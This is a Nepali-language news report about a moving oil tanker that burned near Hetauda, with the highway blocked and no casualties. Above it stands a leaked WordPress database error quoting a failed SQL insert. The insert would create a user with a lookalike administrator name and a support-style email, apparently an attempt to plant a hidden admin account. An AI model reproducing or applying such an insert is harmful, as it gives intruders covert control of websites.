WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BN.CHFUWbsuTktFttCRnMlT7GnQ83N1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 02:11:36', '', 'admlnlx', 'admlnlx')
हेटौंडा, ३ पुस ।
मकवानपुरको हेटौंडा उपमहानगरपालिका १५ चुरियामाई रातोमाटे नजिकै गुडिरहेको तेल ट्याङ्करमा मंगलबार आगलागी भएको छ।
आगलागीबाट ना ४ ख २९५८ नम्बरको ट्याङ्कर पूर्ण रूपमा क्षति भएकोे प्रत्यक्षदर्शीले बताएका छन् । दिउँसो ४ बजेतिर तार सर्ट भएर आगलागी भएको प्रहरीको अनुमान छ।
जनपद, ट्राफिक प्रहरी र नेपाली सेनाको संयुक्त टोलीले आगो निभाएका थिए । हेटौँडा उपमहानगरपालिका र अमलेखगन्जको आयल निगमको बारुण यन्त्रको सहायताले आगो निभाइएको थियो ।
घटनाका कारण केही घण्डा पूर्वपश्चिम राजमार्ग अवरुद्ध भएको थियो। आगो नियन्त्रणमा लिई ट्याङ्करलाई पन्छाएर राजमार्ग खुलाइएको मकवानपुरका प्रहरी उपरीक्षक बुद्धिराज गुरुङले जानकारी दिए। आगलागीका कारण ट्रकको अगाडिको सबै भाग जलेर नस्ट भएको छ। घटनामा मानवीय क्षति नभएको प्रहरीले जनाएको छ।